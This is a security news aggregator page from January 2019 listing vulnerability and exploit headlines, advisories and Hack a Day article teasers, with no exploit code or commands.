< Back to JetLib.com

jetlib.sec

« Expand/Collapse

Recent items

Skip to page: 1 2 3 4 ... 865

January 18, 2019
10:30
phpTransformer 2016.9 SQL Injection
» ‎ Packet Storm Security Misc. Files

phpTransformer version 2016.9 suffers from a remote SQL injection vulnerability.
Tags:

10:29
SeoToaster Ecommerce 3.0.0 Local File Inclusion
» ‎ Packet Storm Security Exploits

SeoToaster Ecommerce version 3.0.0 suffers from a local file inclusion vulnerability.
Tags:

10:29
SeoToaster Ecommerce 3.0.0 Local File Inclusion
» ‎ Packet Storm Security Recent Files

SeoToaster Ecommerce version 3.0.0 suffers from a local file inclusion vulnerability.
Tags:

10:29
SeoToaster Ecommerce 3.0.0 Local File Inclusion
» ‎ Packet Storm Security Misc. Files

SeoToaster Ecommerce version 3.0.0 suffers from a local file inclusion vulnerability.
Tags:

10:00
Inventors Chasing Their Dreams; What It’s Like to Quit Your Job and Hack
» ‎ Hack a Day

The phrase “Hindsight is 20/20” is one of those things that we all say from time to time, but rarely have a chance to truly appreciate to the fullest. Taken in the most literal context, it means that once you know the end result of a particular scenario, you can look back and clearly see the progression towards that now inescapable endgame. For example, if you’re stuck on the couch with a bad case of food poisoning, you might employ the phrase “Hindsight is 20/20” to describe the decision a few days prior to eat that food truck sushi.

Then …read more

Tags: cons

9:28
Twitter Warns That Private Tweets Were Public For Years
» ‎ Packet Storm Security Headlines

Twitter Warns That Private Tweets Were Public For Years
Tags: headlineprivacydata lossflawtwitter
9:28
Microsoft Partner Portal Exposes Every Support Request Filed
» ‎ Packet Storm Security Headlines

Microsoft Partner Portal Exposes Every Support Request Filed
Tags: headlineprivacymicrosoftdata loss
9:28
Oracle Releases Patches For 284 Vulnerabilities
» ‎ Packet Storm Security Headlines

Oracle Releases Patches For 284 Vulnerabilities
Tags: headlinedatabaseflawpatchoracle
9:28
Microsoft Blue Biz Bug Bounty Bonanza Beckons
» ‎ Packet Storm Security Headlines

Microsoft Blue Biz Bug Bounty Bonanza Beckons
Tags: headlinehackermicrosoftflawpatch
9:28
Shutdown Threatens More Government Websites
» ‎ Packet Storm Security Headlines

Shutdown Threatens More Government Websites
Tags: headlinegovernmentprivacyusaflawcryptography

9:01
Hackaday Podcast Ep2 – Curious Gadgets And The FPGA Brain Trust
» ‎ Hack a Day

Enclosure: [download]

In this week’s podcast, editors Elliot Williams and Mike Szczys look back on favorite hacks and articles from the week. Highlights include a deep dive in barn-door telescope trackers, listening in on mains power, the backstory of a supercomputer inventor, and crazy test practices with new jet engine designs. We discuss some of our favorite circuit sculptures, and look at a new textile-based computer and an old server-based one.

This week, a round table of who’s-who in the Open Source FPGA movement discusses what’s next in 2019. David Shah, Clifford Wolf, Piotr Esden-Tempski, and Tim Ansel spoke with Elliot during …read more

Tags: hackaday Columns
8:30
DIY Clapper is 1980s Style With Raspberry Pi Twist
» ‎ Hack a Day

Home automation isn’t all that new. It is just more evolved. Many years ago, a TV product appeared called the Clapper. If you haven’t heard of it, it was basically a sound-operated AC switch. You plug, say, a lamp into the device and the clapper into the wall and you can then turn the lamp on or off by clapping. If you somehow missed these — and you can still get them, apparently — have a look at the 1984 commercial in the video below. [Ash] decided to forego ordering one on Amazon and instead built her own using a …read more

Tags: home hacks

7:22
DotNetNuke Events Calendar 1.x File Download
» ‎ Packet Storm Security Exploits

DotNetNuke Events Calendar module version 1.x suffers from a file download vulnerability.
Tags:

7:22
DotNetNuke Events Calendar 1.x File Download
» ‎ Packet Storm Security Recent Files

DotNetNuke Events Calendar module version 1.x suffers from a file download vulnerability.
Tags:

7:22
DotNetNuke Events Calendar 1.x File Download
» ‎ Packet Storm Security Misc. Files

DotNetNuke Events Calendar module version 1.x suffers from a file download vulnerability.
Tags:

7:01
Oreo Construction: Hiding Your Components Inside The PCB
» ‎ Hack a Day

In recent months, the ability to hide components inside a circuit board has become an item of interest. We could trace this to the burgeoning badgelife movement, where engineers create beautiful works of electronic art. We can also attribute this interest to Bloomberg’s Big Hack, where Jordan Robertson and Michael Riley asserted Apple was the target of Chinese spying using components embedded inside a motherboard. The Big Hack story had legs, but so far no evidence of this hack’s existence has come to light, and the companies and governments involved have all issued denials that anything like this exists. …read more

Tags: engineering

6:44
Webmin 1.900 Remote Command Execution
» ‎ Packet Storm Security Exploits

This Metasploit module exploits an arbitrary command execution vulnerability in Webmin versions 1.900 and below. Any user authorized to the "Java file manager" and "Upload and Download" fields, to execute arbitrary commands with root privileges. In addition, "Running Processes" field must be authorized to discover the directory to be uploaded. A vulnerable file can be printed on the original files of the Webmin application. The vulnerable file we are uploading should be integrated with the application. Therefore, a ".cgi" file with the vulnerability belong to webmin application should be used. The module has been tested successfully with Webmin version 1.900 over Debian 4.9.18.
Tags:

6:44
Webmin 1.900 Remote Command Execution
» ‎ Packet Storm Security Recent Files

This Metasploit module exploits an arbitrary command execution vulnerability in Webmin versions 1.900 and below. Any user authorized to the "Java file manager" and "Upload and Download" fields, to execute arbitrary commands with root privileges. In addition, "Running Processes" field must be authorized to discover the directory to be uploaded. A vulnerable file can be printed on the original files of the Webmin application. The vulnerable file we are uploading should be integrated with the application. Therefore, a ".cgi" file with the vulnerability belong to webmin application should be used. The module has been tested successfully with Webmin version 1.900 over Debian 4.9.18.
Tags:

6:44
Webmin 1.900 Remote Command Execution
» ‎ Packet Storm Security Misc. Files

This Metasploit module exploits an arbitrary command execution vulnerability in Webmin versions 1.900 and below. Any user authorized to the "Java file manager" and "Upload and Download" fields, to execute arbitrary commands with root privileges. In addition, "Running Processes" field must be authorized to discover the directory to be uploaded. A vulnerable file can be printed on the original files of the Webmin application. The vulnerable file we are uploading should be integrated with the application. Therefore, a ".cgi" file with the vulnerability belong to webmin application should be used. The module has been tested successfully with Webmin version 1.900 over Debian 4.9.18.
Tags:

4:00
Ben Heck Can Program The Smallest Microcontroller
» ‎ Hack a Day

Microcontrollers are small, no one is arguing that. On a silicon wafer the size of a grain of rice, you can connect a GPS tracker to the Internet. Put that in a package, and you can put the Internet of Things into something the size of a postage stamp. There’s one microcontroller that’s smaller than all the others. It’s the ATtiny10, and its brethren the ATtiny4, 5, and 9. It comes in an SOT-23-6 package, a size that’s more often seen in packages for single transistors. It’s not very capable, but it is very small. It’s also very weird, with …read more

Tags: attiny hacks

2:11
SSHtranger Things SCP Client File Issue
» ‎ Packet Storm Security Exploits

SCP clients have an issue where additional files can be copied over without your knowledge.
Tags:

2:11
SSHtranger Things SCP Client File Issue
» ‎ Packet Storm Security Recent Files

SCP clients have an issue where additional files can be copied over without your knowledge.
Tags:

2:11
SSHtranger Things SCP Client File Issue
» ‎ Packet Storm Security Misc. Files

SCP clients have an issue where additional files can be copied over without your knowledge.
Tags:

1:00
Hacking Hackaday.io from CircuitPython
» ‎ Hack a Day

If you’ve ever engaged in social media, you’re familiar with the little thrill you receive when your post, tweet, or project gets a like. But, if logging in feels like too much overhead to obtain your dopamine reward, [pt’s] CircuitPython Hackaday portal may be just what you’re looking for. This project creates a stand-alone counter to display the number of “skulls” (aka likes) received by a project on hackaday.io, and of course, it’s currently counting its own.

The code is running on a SAMD51 (Cortex M4) microcontroller and serving up the skulls on 240×320 TFT display. For WiFi connectivity, the …read more

Tags: Wireless hacks

0:55
[SECURITY] [DSA 4370-1] drupal7 security update
» ‎ Bugtraq

Posted by Moritz Muehlenhoff on Jan 18
-------------------------------------------------------------------------
Debian Security Advisory DSA-4370-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
January 17, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : drupal7
CVE ID : not yet available

Two...

Tags:
0:51
[SYSS-2018-043] Authentication Bypass in Kentix MultiSensor LAN - CVE-2018-19783
» ‎ Bugtraq

Posted by Micha Borrmann on Jan 18
Advisory ID: SYSS-2018-043
Product: MultiSensor-LAN
Manufacturer: Kentix GmbH
Affected Version(s): 5.63.00 <=
Tested Version(s): 5.60.01, 5.63.00
Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel (CWE-288)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-12-03
Solution Date: -
Public...

Tags:

0:00
Vuln: Mozilla Firefox and Firefox ESR Multiple Security Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Mozilla Firefox and Firefox ESR Multiple Security Vulnerabilities
Tags:
0:00
Vuln: systemd-journald CVE-2018-16865 Stack Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

systemd-journald CVE-2018-16865 Stack Buffer Overflow Vulnerability
Tags:
0:00
Vuln: Ghostscript CVE-2018-19134 Remote Code Execution Vulnerability
» ‎ SecurityFocus Vulnerabilities

Ghostscript CVE-2018-19134 Remote Code Execution Vulnerability
Tags:
0:00
Vuln: QEMU CVE-2018-16867 Directory Traversal Vulnerability
» ‎ SecurityFocus Vulnerabilities

QEMU CVE-2018-16867 Directory Traversal Vulnerability
Tags:
0:00
Vuln: NTP CVE-2018-12327 Stack Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

NTP CVE-2018-12327 Stack Buffer Overflow Vulnerability
Tags:
0:00
Vuln: Linux Kernel 'kernel/events/core.c' Local Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'kernel/events/core.c' Local Denial of Service Vulnerability
Tags:
0:00
Vuln: Linux Kernel 'arch/x86/kernel/cpu/mcheck/mce.c' Local Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'arch/x86/kernel/cpu/mcheck/mce.c' Local Denial of Service Vulnerability
Tags:

January 17, 2019
22:22
FastTube 1.0.1.0 Denial Of Service
» ‎ Packet Storm Security Exploits

FastTube version 1.0.1.0 suffers from a denial of service vulnerability.
Tags:

22:22
FastTube 1.0.1.0 Denial Of Service
» ‎ Packet Storm Security Recent Files

FastTube version 1.0.1.0 suffers from a denial of service vulnerability.
Tags:

22:22
FastTube 1.0.1.0 Denial Of Service
» ‎ Packet Storm Security Misc. Files

FastTube version 1.0.1.0 suffers from a denial of service vulnerability.
Tags:

22:00
Long-Range RFID With Feedback
» ‎ Hack a Day

Not long ago, we published an article about researchers adding sensor data to passive RFID tags, and a comment from a reader turned our heads to a consumer/maker version which anyone can start using right away. If you’re catching up, passive RFID technology is behind the key fobs and stickers which don’t need power, just proximity to the reader’s antenna. This is a much “hackier” version that works with discrete signals instead of analog ones. It will not however require writing a new library and programming new tags from the ground up just for the user to get started, so …read more

Tags: Wireless hacks

20:44
Eco Search 1.0.2.0 Denial Of Service
» ‎ Packet Storm Security Exploits

Eco Search version 1.0.2.0 suffers from a denial of service vulnerability.
Tags:

20:44
Eco Search 1.0.2.0 Denial Of Service
» ‎ Packet Storm Security Recent Files

Eco Search version 1.0.2.0 suffers from a denial of service vulnerability.
Tags:

20:44
Eco Search 1.0.2.0 Denial Of Service
» ‎ Packet Storm Security Misc. Files

Eco Search version 1.0.2.0 suffers from a denial of service vulnerability.
Tags:

20:22
One Search 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Exploits

One Search version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

20:22
One Search 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Recent Files

One Search version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

20:22
One Search 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Misc. Files

One Search version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

19:44
VPN Browser+ 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Exploits

VPN Browser+ version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

19:44
VPN Browser+ 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Recent Files

VPN Browser+ version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

19:44
VPN Browser+ 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Misc. Files

VPN Browser+ version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

19:33
7 Tik 1.0.1.0 Denial Of Service
» ‎ Packet Storm Security Exploits

7 Tik version 1.0.1.0 suffers from a denial of service vulnerability.
Tags:

19:33
7 Tik 1.0.1.0 Denial Of Service
» ‎ Packet Storm Security Recent Files

7 Tik version 1.0.1.0 suffers from a denial of service vulnerability.
Tags:

19:33
7 Tik 1.0.1.0 Denial Of Service
» ‎ Packet Storm Security Misc. Files

7 Tik version 1.0.1.0 suffers from a denial of service vulnerability.
Tags:

19:00
Designing A Toilet Roll Holder
» ‎ Hack a Day

Everything needs to be designed, at one point or another. There are jobs for those who design kitchens, and stadiums, and interplanetary spacecraft. However, there are also jobs for those who design cutlery, hose fittings, and even toilet roll holders. [Eric Strebel] is here to share just such a story.

[Eric] covers the whole process from start to finish. In the beginning, a wide variety of concepts are drawn up and explored on paper. Various ideas are evaluated against each other and whittled down to a small handful. Then, cardboard models are created and the concepts further refined. This continues …read more

Tags: home hacks

18:22
Watchr 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Exploits

Watchr version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

18:22
Watchr 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Recent Files

Watchr version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

18:22
Watchr 1.1.0.0 Denial Of Service
» ‎ Packet Storm Security Misc. Files

Watchr version 1.1.0.0 suffers from a denial of service vulnerability.
Tags:

16:00
This Computer Mouse Houses A Mouse Computer
» ‎ Hack a Day

Everyone has heard of a computer mouse before, but what about a mouse computer?

Granted, [Electronic Grenade]’s all-in-one computer in an oversized mouse-shaped case is almost without practical value. But that’s hardly the point, which was just to do something cool. Inspiration came from keyboards stuffed with a Raspberry Pi to make a mostly-all-in-one machine; this Rodent of Unusual Size is the next logical step. With a Pi Zero W and a LiPo battery alongside a mouse mechanism inside the 3D-printed case – alas, no real mouse currently on the market would house everything – the computer sports not only …read more

Tags: raspberry

15:13
Falco 0.13.1
» ‎ Packet Storm Security Recent Files

Sysdig falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about falco as a mix between snort, ossec and strace.
Tags:

15:13
Falco 0.13.1
» ‎ Packet Storm Security Tools

Sysdig falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about falco as a mix between snort, ossec and strace.
Tags:

15:13
Falco 0.13.1
» ‎ Packet Storm Security Misc. Files

Sysdig falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about falco as a mix between snort, ossec and strace.
Tags:

15:08
Microsoft Edge Chakra InlineArrayPush Type Confusion
» ‎ Packet Storm Security Exploits

Microsoft Edge suffers from a Chakra related type confusion vulnerability in InlineArrayPush.
Tags:

15:08
Microsoft Edge Chakra InlineArrayPush Type Confusion
» ‎ Packet Storm Security Recent Files

Microsoft Edge suffers from a Chakra related type confusion vulnerability in InlineArrayPush.
Tags:

15:08
Microsoft Edge Chakra InlineArrayPush Type Confusion
» ‎ Packet Storm Security Misc. Files

Microsoft Edge suffers from a Chakra related type confusion vulnerability in InlineArrayPush.
Tags:

15:03
Mozilla Firefox 64 Information Disclosure
» ‎ Packet Storm Security Exploits

Mozilla Firefox versions 64 and below have an issue where an overly liberal same-origin policy for file URIs and a bug in the implementation of this policy make Firefox vulnerable to exposure of local files to a remote attacker.
Tags:

15:03
Mozilla Firefox 64 Information Disclosure
» ‎ Packet Storm Security Recent Files

Mozilla Firefox versions 64 and below have an issue where an overly liberal same-origin policy for file URIs and a bug in the implementation of this policy make Firefox vulnerable to exposure of local files to a remote attacker.
Tags:

15:03
Mozilla Firefox 64 Information Disclosure
» ‎ Packet Storm Security Misc. Files

Mozilla Firefox versions 64 and below have an issue where an overly liberal same-origin policy for file URIs and a bug in the implementation of this policy make Firefox vulnerable to exposure of local files to a remote attacker.
Tags:

14:59
Siemens SICAM A8000 Series Denial Of Service
» ‎ Packet Storm Security Exploits

Siemens SICAM A8000 Series suffers from an XML injection denial of service vulnerability.
Tags:

14:59
Siemens SICAM A8000 Series Denial Of Service
» ‎ Packet Storm Security Recent Files

Siemens SICAM A8000 Series suffers from an XML injection denial of service vulnerability.
Tags:

14:59
Siemens SICAM A8000 Series Denial Of Service
» ‎ Packet Storm Security Misc. Files

Siemens SICAM A8000 Series suffers from an XML injection denial of service vulnerability.
Tags:

14:52
Oracle Reports Developer 12.2.1.3 Cross Site Scripting
» ‎ Packet Storm Security Exploits

Oracle Reports Developer component version 12.2.1.3 suffers from a cross site scripting vulnerability.
Tags:

14:52
Oracle Reports Developer 12.2.1.3 Cross Site Scripting
» ‎ Packet Storm Security Recent Files

Oracle Reports Developer component version 12.2.1.3 suffers from a cross site scripting vulnerability.
Tags:

14:52
Oracle Reports Developer 12.2.1.3 Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

Oracle Reports Developer component version 12.2.1.3 suffers from a cross site scripting vulnerability.
Tags:

14:51
Linux/x86 TCP/4444 Bindshell Shellcode
» ‎ Packet Storm Security Recent Files

100 bytes small Linux/x86 TCP/4444 bindshell shellcode.
Tags:

14:51
Linux/x86 TCP/4444 Bindshell Shellcode
» ‎ Packet Storm Security Misc. Files

100 bytes small Linux/x86 TCP/4444 bindshell shellcode.
Tags:

14:49
Ubuntu Security Notice USN-3862-1
» ‎ Packet Storm Security Advisories

Ubuntu Security Notice 3862-1 - It was discovered that Irssi incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service or to execute arbitrary code.
Tags:

14:49
Ubuntu Security Notice USN-3862-1
» ‎ Packet Storm Security Recent Files

Ubuntu Security Notice 3862-1 - It was discovered that Irssi incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service or to execute arbitrary code.
Tags:

14:49
Ubuntu Security Notice USN-3862-1
» ‎ Packet Storm Security Misc. Files

Ubuntu Security Notice 3862-1 - It was discovered that Irssi incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service or to execute arbitrary code.
Tags:

14:48
Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection
» ‎ Packet Storm Security Exploits

Joomla YoutubeGallery component version 4.5.8 suffers from database disclosure and remote SQL injection vulnerabilities.
Tags:

14:48
Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection
» ‎ Packet Storm Security Recent Files

Joomla YoutubeGallery component version 4.5.8 suffers from database disclosure and remote SQL injection vulnerabilities.
Tags:

14:48
Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection
» ‎ Packet Storm Security Misc. Files

Joomla YoutubeGallery component version 4.5.8 suffers from database disclosure and remote SQL injection vulnerabilities.
Tags:

14:48
Joomla ZHYandexMap 8.0.0.2 Database Disclosure
» ‎ Packet Storm Security Exploits

Joomla ZHYandexMap component version 8.0.0.2 suffers from a database disclosure vulnerability.
Tags:

14:48
Joomla ZHYandexMap 8.0.0.2 Database Disclosure
» ‎ Packet Storm Security Recent Files

Joomla ZHYandexMap component version 8.0.0.2 suffers from a database disclosure vulnerability.
Tags:

14:48
Joomla ZHYandexMap 8.0.0.2 Database Disclosure
» ‎ Packet Storm Security Misc. Files

Joomla ZHYandexMap component version 8.0.0.2 suffers from a database disclosure vulnerability.
Tags:

14:22
Microsoft Edge Chakra JIT Use-After-Free / Flag Issue
» ‎ Packet Storm Security Exploits

In Microsoft Edge, the JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js which initializes some builtin objects. Because it is essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is, it does not restore the previous status of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.
Tags:

14:22
Microsoft Edge Chakra JIT Use-After-Free / Flag Issue
» ‎ Packet Storm Security Recent Files

In Microsoft Edge, the JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js which initializes some builtin objects. Because it is essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is, it does not restore the previous status of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.
Tags:

14:22
Microsoft Edge Chakra JIT Use-After-Free / Flag Issue
» ‎ Packet Storm Security Misc. Files

In Microsoft Edge, the JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js which initializes some builtin objects. Because it is essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is, it does not restore the previous status of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.
Tags:

13:00
Win Back Some Privacy With A Cone Of Silence For Your Smart Speaker
» ‎ Hack a Day

To quote the greatest philosopher of the 20th century: “The future ain’t what it used to be.” Take personal assistants such as Amazon Echo and Google Home. When first predicted by sci-fi writers, the idea of instant access to the sum total of human knowledge with a few utterances seemed like a no-brainer; who wouldn’t want that? But now that such things are a reality, having something listening to you all the time and potentially reporting everything it hears back to some faceless corporate monolith is unnerving, to say the least.

There’s a fix for that, though, with this cone …read more

Tags: raspberry

12:35
Microsoft Edge Chakra JIT InitClass Type Confusion
» ‎ Packet Storm Security Advisories

Microsoft Edge suffers from a type confusion vulnerability in InitClass.
Tags:

12:35
Microsoft Edge Chakra JIT InitClass Type Confusion
» ‎ Packet Storm Security Recent Files

Microsoft Edge suffers from a type confusion vulnerability in InitClass.
Tags:

12:35
Microsoft Edge Chakra JIT InitClass Type Confusion
» ‎ Packet Storm Security Misc. Files

Microsoft Edge suffers from a type confusion vulnerability in InitClass.
Tags:

12:32
Microsoft Edge JIT Chakra NewScObjectNoCtor / InitProto Type Confusion
» ‎ Packet Storm Security Exploits

Microsoft Edge has an issue where NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
Tags:
12:32
Check Point ZoneAlarm 8.8.1.110 Local Privilege Escalation
» ‎ Packet Storm Security Exploits

Check Point ZoneAlarm version 8.8.1.110 suffers from a local privilege escalation vulnerability.
Tags:

12:32
Microsoft Edge JIT Chakra NewScObjectNoCtor / InitProto Type Confusion
» ‎ Packet Storm Security Recent Files

Microsoft Edge has an issue where NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
Tags:
12:32
Check Point ZoneAlarm 8.8.1.110 Local Privilege Escalation
» ‎ Packet Storm Security Recent Files

Check Point ZoneAlarm version 8.8.1.110 suffers from a local privilege escalation vulnerability.
Tags:

12:32
Microsoft Edge JIT Chakra NewScObjectNoCtor / InitProto Type Confusion
» ‎ Packet Storm Security Misc. Files

Microsoft Edge has an issue where NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
Tags:
12:32
Check Point ZoneAlarm 8.8.1.110 Local Privilege Escalation
» ‎ Packet Storm Security Misc. Files

Check Point ZoneAlarm version 8.8.1.110 suffers from a local privilege escalation vulnerability.
Tags:

11:31
Hackaday Superconference: Estefannie’s Daft Punk Helmet
» ‎ Hack a Day

There’s no single formula for success, but if we’ve learned anything over the years of covering cons, contests, and hackathons, it’s that, just like in geology, pressure can create diamonds. Give yourself an impossible deadline with high stakes, and chances are good that something interesting will result. That’s what Estefannie from the YouTube channel “Estefannie Explains It All” did when Bay Area Maker Faire was rolling around last year, and she stopped by the 2018 Hackaday Superconference to talk about the interactive Daft Punk helmet that came out of it.

It’s a rapid-fire tour of Estefannie’s remarkably polished replica of …read more

Tags: cons
10:00
Hack Your Gmail: A Quick Start for Google App Scripting
» ‎ Hack a Day

For many people, Gmail is synonymous with e-mail. Some people like having cloud access to everything and some people hate having any personal data in the cloud. However you feel about it, one thing that was nice about having desktop software is that you could hack it relatively easily. If you didn’t like how your desktop mail client worked, you had a lot of options: use a different program, write your own, hack the executable of your current program, or in the case of open source just fork it and make any changes you are smart enough to make.

Google …read more

Tags: hackaday Columns

9:08
#0daytoday #Spotify 1.0.96.181 - Proxy configuration Denial of Service Exploit [dos #exploits #0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #Spotify 1.0.96.181 - Proxy configuration Denial of Service Exploit [dos #exploits #0day #Exploit]
Tags:
9:03
#0daytoday #NTPsec 1.1.2 - ctl_getitem Out-of-Bounds Read Exploit CVE-2019-6443 [dos #exploits #0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #NTPsec 1.1.2 - ctl_getitem Out-of-Bounds Read Exploit CVE-2019-6443 [dos #exploits #0day #Exploit]
Tags:
9:03
#0daytoday #NTPsec 1.1.2 - ntp_control Authenticated NULL Pointer Dereference Exploit [#0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #NTPsec 1.1.2 - ntp_control Authenticated NULL Pointer Dereference Exploit [#0day #Exploit]
Tags:
8:56
#0daytoday #NTPsec 1.1.2 - ntp_control Out-of-Bounds Read Exploit CVE-2019-6444 [dos #exploits #0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #NTPsec 1.1.2 - ntp_control Out-of-Bounds Read Exploit CVE-2019-6444 [dos #exploits #0day #Exploit]
Tags:
8:56
#0daytoday #Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length [#0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length [#0day #Exploit]
Tags:
8:56
#0daytoday #NTPsec 1.1.2 - config Authenticated Out-of-Bounds Write Denial of Service Exploit [#0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #NTPsec 1.1.2 - config Authenticated Out-of-Bounds Write Denial of Service Exploit [#0day #Exploit]
Tags:
8:56
#0daytoday #WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free Exploit [dos #exploits #0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free Exploit [dos #exploits #0day #Exploit]
Tags:

8:30
You’ll Never See the End of This Project
» ‎ Hack a Day

…theoretically, anyway. When [Quinn] lucked into a bunch of 5 mm red LEDs and a tube of 74LS164 shift registers, a project sprang to mind: “The Forever Number,” a pseudo-random number generator with a period longer than the age of the universe. Of course, the components used will fail long before the sequence repeats, but who cares, this thing looks awesome!

The core of the project is a 242-bit linear-feedback shift register (LFSR) constructed from (31) 74LS164’s. An XOR gate and inverter computes the next bit of the sequence by XNOR’ing two feedback bits taken from taps on the register, …read more

Tags: Hardware

8:01
Red Hat Security Advisory 2019-0095-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0095-01 - In accordance with the Red Hat Enterprise Linux Errata Support Policy, Extended Update Support for Red Hat Enterprise Linux 6.7 was retired as of December 31, 2018, and active support will no longer be provided. Accordingly, Red Hat will no longer provide updated packages, including Critical Impact security patches or Urgent Priority bug fixes, for Red Hat Enterprise Linux 6.7 EUS after December 31, 2018.
Tags:

8:01
Red Hat Security Advisory 2019-0095-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0095-01 - In accordance with the Red Hat Enterprise Linux Errata Support Policy, Extended Update Support for Red Hat Enterprise Linux 6.7 was retired as of December 31, 2018, and active support will no longer be provided. Accordingly, Red Hat will no longer provide updated packages, including Critical Impact security patches or Urgent Priority bug fixes, for Red Hat Enterprise Linux 6.7 EUS after December 31, 2018.
Tags:

8:01
Red Hat Security Advisory 2019-0095-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0095-01 - In accordance with the Red Hat Enterprise Linux Errata Support Policy, Extended Update Support for Red Hat Enterprise Linux 6.7 was retired as of December 31, 2018, and active support will no longer be provided. Accordingly, Red Hat will no longer provide updated packages, including Critical Impact security patches or Urgent Priority bug fixes, for Red Hat Enterprise Linux 6.7 EUS after December 31, 2018.
Tags:

8:01
Debian Security Advisory 4367-2
» ‎ Packet Storm Security Advisories

Debian Linux Security Advisory 4367-2 - The Qualys Research Labs reported that the backported security fixes shipped in DSA 4367-1 contained a memory leak in systemd-journald. This and an unrelated bug in systemd-coredump are corrected in this update.
Tags:

8:01
Debian Security Advisory 4367-2
» ‎ Packet Storm Security Recent Files

Debian Linux Security Advisory 4367-2 - The Qualys Research Labs reported that the backported security fixes shipped in DSA 4367-1 contained a memory leak in systemd-journald. This and an unrelated bug in systemd-coredump are corrected in this update.
Tags:

8:01
Debian Security Advisory 4367-2
» ‎ Packet Storm Security Misc. Files

Debian Linux Security Advisory 4367-2 - The Qualys Research Labs reported that the backported security fixes shipped in DSA 4367-1 contained a memory leak in systemd-journald. This and an unrelated bug in systemd-coredump are corrected in this update.
Tags:

7:01
Sharpest Color CRT Display is Monochrome Plus a Trick
» ‎ Hack a Day

